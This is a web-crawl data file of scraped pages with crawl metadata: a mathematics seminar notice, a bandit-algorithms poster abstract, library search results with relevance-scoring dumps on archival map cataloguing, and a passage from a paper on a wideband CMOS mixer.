{"ft_lang_label":"__label__zh","ft_lang_prob":0.86434746,"math_prob":0.9976773,"size":2869,"snap":"2021-43-2021-49","text_gpt3_token_len":2291,"char_repetition_ratio":0.09075043,"word_repetition_ratio":0.94779116,"special_character_ratio":0.36075288,"punctuation_ratio":0.12541254,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9963448,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,1,null,null,null,6,null,7,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T04:09:43Z\",\"WARC-Record-ID\":\"<urn:uuid:ca97e57c-074a-4612-b8b8-37c18fd90fee>\",\"Content-Length\":\"31461\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1134387c-b80c-4c1f-b6f0-5ba5445e4600>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bf6f6bb-0846-4138-895b-a7ed67563fd3>\",\"WARC-IP-Address\":\"123.57.233.100\",\"WARC-Target-URI\":\"https://www.wenjiangs.com/group/topic-10259.html\",\"WARC-Payload-Digest\":\"sha1:YMA4EFMJJYTWN6SG4JWNKE5UTEE4JMMY\",\"WARC-Block-Digest\":\"sha1:KNKITFNS23MJAVMSIOQVVVVMOUECNLSK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585381.88_warc_CC-MAIN-20211021040342-20211021070342-00283.warc.gz\"}"}
https://www.niser.ac.in/sms/news/seminar-156
[ "# News & Events\n\n## Seminar\n\nDate/Time:\nThursday, January 3, 2019 - 11:30\nVenue:\nM1\nSpeaker:\nAffiliation:\nISI Kolkata\nTitle:\nFree-type rigid C*-tensor categories and their annular representations\n\nC*-tensor categories are important descriptors of generalized symmetries appearing in non-commutative analysis and mathematical physics. An important algebra associated to a rigid semisimple C*-tensor category $\\mathcal{C}$ is the tube algebra $\\mathcal{A}\\mathcal{C}$. The tube algebra admits a universal C*-algebra, hence has a well behaved representation category. Further, this representation category provides a useful way to describe the analytic properties of initial C*-tensor categories, such as amenability, the Haagerup property, and property (T).With a brief motivation from different directions, in this talk, I will move on to describing the annular algebra $\\mathcal{A}\\Lambda$ associated to a rigid C*-tensor category $\\mathcal{C}$. The annular representation category of $\\mathcal{C}$ is the category of $*$-representations of the annular algebra $\\mathcal{A}\\Lambda$. I will then present a description of the annular representation category of free product of two categories with an application to the Fuss-Catalan subfactor planar algebra.We then move onto oriented extensions of subfactor planar algebras (or equivalently singly generated C*-2-categories), which are a class of singly generated C*-tensor categories (or equivalently oriented factor planar algebras). I will end the talk with few problems which could extend this work." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7931548,"math_prob":0.8838454,"size":1519,"snap":"2020-24-2020-29","text_gpt3_token_len":357,"char_repetition_ratio":0.14587459,"word_repetition_ratio":0.009852217,"special_character_ratio":0.22119816,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98559725,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-06T18:05:06Z\",\"WARC-Record-ID\":\"<urn:uuid:e85b2a03-1839-471b-8f35-72450255e4c2>\",\"Content-Length\":\"44434\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:27b0c56f-d947-4649-8050-cbf117219995>\",\"WARC-Concurrent-To\":\"<urn:uuid:10d9f965-4a7a-42ab-b058-3b1a4d808141>\",\"WARC-IP-Address\":\"210.212.23.110\",\"WARC-Target-URI\":\"https://www.niser.ac.in/sms/news/seminar-156\",\"WARC-Payload-Digest\":\"sha1:XZPH2S3NOBPHLPZV4Y4UNCKRZQ7DSJY5\",\"WARC-Block-Digest\":\"sha1:XBZXWTEHWHF5RIR3NT35V2ZXDD5HEOZL\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348517506.81_warc_CC-MAIN-20200606155701-20200606185701-00302.warc.gz\"}"}
https://virtual.aistats.org/virtual/2021/poster/1577
[ "## Bandit algorithms: Letting go of logarithmic regret for statistical robustness\n\n### Kumar Ashutosh · Jayakrishnan Nair · Anmol Kagrecha · Krishna Jagannathan\n\nKeywords: [ Learning Theory and Statistics ] [ Decision Processes and Bandits ]\n\nAbstract:\n\nWe study regret minimization in a stochastic multi-armed bandit setting, and establish a fundamental trade-off between the regret suffered under an algorithm, and its statistical robustness. Considering broad classes of underlying arms' distributions, we show that bandit learning algorithms with logarithmic regret are always inconsistent and that consistent learning algorithms always suffer a super-logarithmic regret. This result highlights the inevitable statistical fragility of all `logarithmic regret' bandit algorithms available in the literature - for instance, if a UCB algorithm designed for 1-subGaussian distributions is used in a subGaussian setting with a mismatched variance parameter, the learning performance could be inconsistent. Next, we show a positive result: statistically robust and consistent learning performance is attainable if we allow the regret to be slightly worse than logarithmic. Specifically, we propose three classes of distribution oblivious algorithms that achieve an asymptotic regret that is arbitrarily close to logarithmic." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.853299,"math_prob":0.87760526,"size":1148,"snap":"2022-05-2022-21","text_gpt3_token_len":203,"char_repetition_ratio":0.13636364,"word_repetition_ratio":0.0,"special_character_ratio":0.16027875,"punctuation_ratio":0.081871346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95893556,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T01:34:10Z\",\"WARC-Record-ID\":\"<urn:uuid:7a09b31f-3ef0-4ec7-8ed0-1eb19f7d4225>\",\"Content-Length\":\"11545\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8d1849d-27c7-4846-b578-a2702d99181e>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d1bc5f7-744f-4560-88c3-21b670fb1f96>\",\"WARC-IP-Address\":\"198.202.70.65\",\"WARC-Target-URI\":\"https://virtual.aistats.org/virtual/2021/poster/1577\",\"WARC-Payload-Digest\":\"sha1:HK5VOUWRARTZEF5IT7FX6AEMISYBHZTB\",\"WARC-Block-Digest\":\"sha1:W2HVSA52OW2QL6XQSWQ2RIQ55CV4MMIL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662552994.41_warc_CC-MAIN-20220523011006-20220523041006-00461.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/31621
[ "# Document (#31621)\n\nAuthor\nCorsaro, J.\nTitle\nControl of cartographic materials in archives\nSource\nCataloging and classification quarterly. 11(1990) nos.3/4, S.213-228\nYear\n1990\nAbstract\nArchival repositories are a major source of cartographic information useful for many kinds of research. Access to these cartographic resources is an integral part of their availability and is related to the general principles of archival arrangement and description. The automation of archival access using the MARC Format for Archives and Manuscripts Control has created great changes in archival description practices. Although there has been a MARC Format for Maps for several years, this format is not as useful for the description of cartographic archives and archivists have not yet developed the generally accepted standards needed to make these materials accessible to a wide range of users. This paper discusses the differences in archival and bibliographic description of maps and suggests some possible options for standards development in the control of cartographic archives.\nFootnote\nSimultaneously published as Describing Archival Materials: The Use of the MARC AMC Format\nField\nGeowissenschaften\nForm\nKarten\nArea\nArchive\n\n## Similar documents (content)\n\n1. Stibbe, H.L.P.: Cataloguing cartographic materials in archives (1999) 0.34\n```0.3437991 = sum of:\n0.3437991 = product of:\n1.227854 = sum of:\n0.032475874 = weight(abstract_txt:generally in 513) [ClassicSimilarity], result of:\n0.032475874 = score(doc=513,freq=1.0), product of:\n0.071567535 = queryWeight, product of:\n5.808377 = idf(docFreq=352, maxDocs=43254)\n0.012321435 = queryNorm\n0.45377943 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.808377 = idf(docFreq=352, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.010941735 = weight(abstract_txt:these in 513) [ClassicSimilarity], result of:\n0.010941735 = score(doc=513,freq=1.0), product of:\n0.04365925 = queryWeight, product of:\n1.1045747 = boost\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.012321435 = queryNorm\n0.25061664 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.039230112 = weight(abstract_txt:materials in 513) [ClassicSimilarity], result of:\n0.039230112 = score(doc=513,freq=1.0), product of:\n0.102273986 = queryWeight, product of:\n1.6905949 = boost\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.012321435 = queryNorm\n0.3835786 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.10691323 = weight(abstract_txt:description in 513) [ClassicSimilarity], result of:\n0.10691323 = score(doc=513,freq=2.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.5357864 = fieldWeight in 513, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.18237998 = weight(abstract_txt:archives in 513) [ClassicSimilarity], result of:\n0.18237998 = score(doc=513,freq=2.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.640187 = fieldWeight in 513, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.794312 = 
idf(docFreq=357, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.42569333 = weight(abstract_txt:archival in 513) [ClassicSimilarity], result of:\n0.42569333 = score(doc=513,freq=4.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.99323833 = fieldWeight in 513, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.43021983 = weight(abstract_txt:cartographic in 513) [ClassicSimilarity], result of:\n0.43021983 = score(doc=513,freq=1.0), product of:\n0.6851607 = queryWeight, product of:\n6.918679 = boost\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.012321435 = queryNorm\n0.62791085 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.28 = coord(7/25)\n```\n2. Carini, P.; Shepherd, K.: ¬The MARC standard and encoded archival description (2004) 0.31\n```0.31427556 = sum of:\n0.31427556 = product of:\n1.1224127 = sum of:\n0.022546375 = weight(abstract_txt:access in 4831) [ClassicSimilarity], result of:\n0.022546375 = score(doc=4831,freq=1.0), product of:\n0.056491695 = queryWeight, product of:\n1.2564617 = boost\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.012321435 = queryNorm\n0.39910954 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.0914158 = weight(abstract_txt:archivists in 4831) [ClassicSimilarity], result of:\n0.0914158 = score(doc=4831,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.80183244 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.05147285 = weight(abstract_txt:standards in 4831) [ClassicSimilarity], result of:\n0.05147285 = score(doc=4831,freq=1.0), product of:\n0.09794575 = queryWeight, product of:\n1.6544352 = boost\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.012321435 = queryNorm\n0.5255241 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.07698692 = weight(abstract_txt:marc in 4831) [ClassicSimilarity], result of:\n0.07698692 = score(doc=4831,freq=1.0), product of:\n0.1280987 = queryWeight, product of:\n1.8920357 = boost\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.012321435 = queryNorm\n0.60099685 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.183318 = weight(abstract_txt:description in 4831) [ClassicSimilarity], result of:\n0.183318 = score(doc=4831,freq=3.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.9186823 = fieldWeight in 4831, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.18054698 = weight(abstract_txt:archives in 4831) [ClassicSimilarity], result of:\n0.18054698 = score(doc=4831,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = 
idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.6337529 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.51612574 = weight(abstract_txt:archival in 4831) [ClassicSimilarity], result of:\n0.51612574 = score(doc=4831,freq=3.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n1.2042375 = fieldWeight in 4831, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.28 = coord(7/25)\n```\n3. Stibbe, H.L.P.: Cataloguing cartographic materials in archives (1999) 0.30\n```0.29902875 = sum of:\n0.29902875 = product of:\n1.0679598 = sum of:\n0.008753388 = weight(abstract_txt:these in 339) [ClassicSimilarity], result of:\n0.008753388 = score(doc=339,freq=1.0), product of:\n0.04365925 = queryWeight, product of:\n1.1045747 = boost\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.012321435 = queryNorm\n0.20049332 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.0522376 = weight(abstract_txt:archivists in 339) [ClassicSimilarity], result of:\n0.0522376 = score(doc=339,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.45818996 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.03138409 = weight(abstract_txt:materials in 339) [ClassicSimilarity], result of:\n0.03138409 = score(doc=339,freq=1.0), product of:\n0.102273986 = queryWeight, product of:\n1.6905949 = boost\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.012321435 = queryNorm\n0.3068629 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.104753144 = weight(abstract_txt:description in 339) [ClassicSimilarity], result of:\n0.104753144 = score(doc=339,freq=3.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.5249613 = fieldWeight in 339, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.14590399 = weight(abstract_txt:archives in 339) [ClassicSimilarity], result of:\n0.14590399 = score(doc=339,freq=2.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.51214963 = fieldWeight in 339, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.38075173 = weight(abstract_txt:archival in 339) [ClassicSimilarity], result of:\n0.38075173 = score(doc=339,freq=5.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.8883794 = fieldWeight in 339, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.34417588 = weight(abstract_txt:cartographic in 339) 
[ClassicSimilarity], result of:\n0.34417588 = score(doc=339,freq=1.0), product of:\n0.6851607 = queryWeight, product of:\n6.918679 = boost\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.012321435 = queryNorm\n0.5023287 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.28 = coord(7/25)\n```\n4. Hsueh, L.-k.: ¬The development and implementation of the MARC AMC : an overview (1997) 0.28\n```0.28430167 = sum of:\n0.28430167 = product of:\n1.1845903 = sum of:\n0.13985881 = weight(abstract_txt:manuscripts in 4285) [ClassicSimilarity], result of:\n0.13985881 = score(doc=4285,freq=1.0), product of:\n0.11933891 = queryWeight, product of:\n1.2913173 = boost\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.012321435 = queryNorm\n1.1719465 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.1099813 = weight(abstract_txt:marc in 4285) [ClassicSimilarity], result of:\n0.1099813 = score(doc=4285,freq=1.0), product of:\n0.1280987 = queryWeight, product of:\n1.8920357 = boost\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.012321435 = queryNorm\n0.8585669 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.11946239 = weight(abstract_txt:control in 4285) [ClassicSimilarity], result of:\n0.11946239 = score(doc=4285,freq=1.0), product of:\n0.15494707 = queryWeight, product of:\n2.5485566 = boost\n4.9343257 = idf(docFreq=845, maxDocs=43254)\n0.012321435 = queryNorm\n0.7709884 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9343257 = idf(docFreq=845, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.13167018 = weight(abstract_txt:format in 4285) [ClassicSimilarity], result of:\n0.13167018 = score(doc=4285,freq=1.0), product of:\n0.16533096 = queryWeight, product of:\n2.6325686 = boost\n5.0969834 = idf(docFreq=718, maxDocs=43254)\n0.012321435 = queryNorm\n0.79640365 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.0969834 = idf(docFreq=718, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.25792426 = weight(abstract_txt:archives in 4285) [ClassicSimilarity], result of:\n0.25792426 = score(doc=4285,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.90536124 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.42569333 = weight(abstract_txt:archival in 4285) [ClassicSimilarity], result of:\n0.42569333 = score(doc=4285,freq=1.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.99323833 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.24 = coord(6/25)\n```\n5. 
Descriptive standards and the archival profession (2003) 0.26\n```0.26484683 = sum of:\n0.26484683 = product of:\n0.9458815 = sum of:\n0.019325463 = weight(abstract_txt:access in 635) [ClassicSimilarity], result of:\n0.019325463 = score(doc=635,freq=1.0), product of:\n0.056491695 = queryWeight, product of:\n1.2564617 = boost\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.012321435 = queryNorm\n0.34209388 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.0783564 = weight(abstract_txt:archivists in 635) [ClassicSimilarity], result of:\n0.0783564 = score(doc=635,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.68728495 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.08391529 = weight(abstract_txt:manuscripts in 635) [ClassicSimilarity], result of:\n0.08391529 = score(doc=635,freq=1.0), product of:\n0.11933891 = queryWeight, product of:\n1.2913173 = boost\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.012321435 = queryNorm\n0.7031679 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.07641736 = weight(abstract_txt:standards in 635) [ClassicSimilarity], result of:\n0.07641736 = score(doc=635,freq=3.0), product of:\n0.09794575 = queryWeight, product of:\n1.6544352 = boost\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.012321435 = queryNorm\n0.78020084 = fieldWeight in 635, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.09071889 = weight(abstract_txt:description in 635) [ClassicSimilarity], result of:\n0.09071889 = score(doc=635,freq=1.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.45462984 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.15475456 = weight(abstract_txt:archives in 635) [ClassicSimilarity], result of:\n0.15475456 = score(doc=635,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.54321676 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.4423935 = weight(abstract_txt:archival in 635) [ClassicSimilarity], result of:\n0.4423935 = score(doc=635,freq=3.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n1.0322036 = fieldWeight in 635, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.28 = coord(7/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6775733,"math_prob":0.9986806,"size":15378,"snap":"2021-31-2021-39","text_gpt3_token_len":5884,"char_repetition_ratio":0.2389749,"word_repetition_ratio":0.485223,"special_character_ratio":0.53407466,"punctuation_ratio":0.283394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975675,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T06:23:29Z\",\"WARC-Record-ID\":\"<urn:uuid:25d8967c-ac69-4ad8-a10c-a9159db23e89>\",\"Content-Length\":\"26632\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fac96563-38fb-4a2e-b473-e526a41133e5>\",\"WARC-Concurrent-To\":\"<urn:uuid:c33caaef-6b68-4671-a984-5a46e4a1a1a6>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/31621\",\"WARC-Payload-Digest\":\"sha1:5TWRKBIVPMMPZJFF64AOONGAYF63BITB\",\"WARC-Block-Digest\":\"sha1:JZVI7VXCY4DYBCGHI5CEUPOJYAMETCRW\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055601.25_warc_CC-MAIN-20210917055515-20210917085515-00498.warc.gz\"}"}
https://www.hindawi.com/journals/tswj/2014/683971/
[ "#### Abstract\n\nA low-power wideband mixer is designed and implemented in 0.13 µm standard CMOS technology based on resistive feedback current-reuse (RFCR) configuration for the application of cognitive radio receiver. The proposed RFCR architecture incorporates an inductive peaking technique to compensate for gain roll-off at high frequency while enhancing the bandwidth. A complementary current-reuse technique is used between transconductance and IF stages to boost the conversion gain without additional power consumption by reusing the DC bias current of the LO stage. This downconversion double-balanced mixer exhibits a high and flat conversion gain (CG) of 14.9 ± 1.4 dB and a noise figure (NF) better than 12.8 dB. The maximum input 1-dB compression point (P1dB) and maximum input third-order intercept point (IIP3) are −13.6 dBm and −4.5 dBm, respectively, over the desired frequency ranging from 50 MHz to 10 GHz. The proposed circuit operates down to a supply headroom of 1 V with a low-power consumption of 3.5 mW.\n\n#### 1. Introduction\n\nAs the number of new wireless applications advents tremendously, the demand for additional frequency spectrum allocation has been growing rapidly. However, the former practice of fixed spectrum allocation policy suffers from the low spectrum utilization setback and this sets a limitation in the available spectrum of accommodating the next generation wireless applications and services . The inefficiency in spectrum usage and the shortage in spectrum have motivated the evolution of CRs. CR was deemed to be an innovative approach due to its versatility in the context of sensing local spectrum reliably and utilizing unoccupied frequency spectrum in the targeted spectral range, while abstaining interference for licensed user by favourably altering its receiving and transmitting parameters . The first international regulation which establishes CRs based system is IEEE 802.22, where the access of unlicensed CR devices on (TV) frequency spectrum (54 MHz–862 MHz) is permitted . Due to excessive demand and technology advancement, the CRs have a greater potential to be expanded further from the constraint of TV band .\n\nThe well-defined folded-cascode mixer is envisaged to surmount the drawbacks that exist in the Gilbert cell mixer. Instead of stacking the switching stage above the transconductance stage, the folded-switching stage is a promising solution to overcome the voltage headroom limitation. The folded-cascode mixer presented in exhibits a narrow band response and it is not suitable for CR application. Hence, a wideband matching network is integrated at the input mixer to achieve a wideband operating frequency . The mixer input matching circuit not only is crucial as an interstage matching in cascaded systems, but also is essential to ensure the wide bandwidth performance by providing a low input reflection loss across the frequency range.\n\nThe RFCR mixer [7, 20] with folded-cascode structure is widely adapted in recent reported work due to the inherent wideband input matching characteristic with low NF and high gain. Although the RFCR architecture had shown good inherent performance but there is severe contradiction in improving wideband input matching and noise due to the large gate-source parasitic capacitance of the input stage transistors. Therefore, a π-match LC network is introduced in to enhance the input matching by creating an extra zero while reducing gate noise by series resonance of at high frequencies. 
The reported low-voltage, low-power RFCR mixer architecture in achieves a high CG over wide range of frequency bandwidth in 65 nm CMOS technology. As the DC current-reuse is not feasible in a folded architecture, the cost of this implementation would be in increased power consumption relative to the technology of implementation.\n\nThe effect of even-order distortion in CRs is more critical than narrow band receivers . This distortion is heavily attributed to the presence of asymmetric mismatch in the downconversion mixer and it causes disturbance to the desired channel. To alleviate this distortion effect, a balanced circuit with differential architecture and symmetrical physical layout is preferred. In this work, a low-voltage, low-power and double-balanced wideband mixer integrates a π-match LC network at the input mixer to meet wideband input matching performance. The complementary current-reuse topology improves the power consumption of mixer while enhancing the RF input transconductance. In addition, an inductive peaking is also employed to improve the mixer noise and conversion gain flatness. The proposed mixer is extracted, simulated, and verified on 0.13 μm standard CMOS platform. This paper is organized as follows. Section 2 reviews and highlights the design limitations and performance trade-offs in conventional RFCR mixer. In Section 3, the 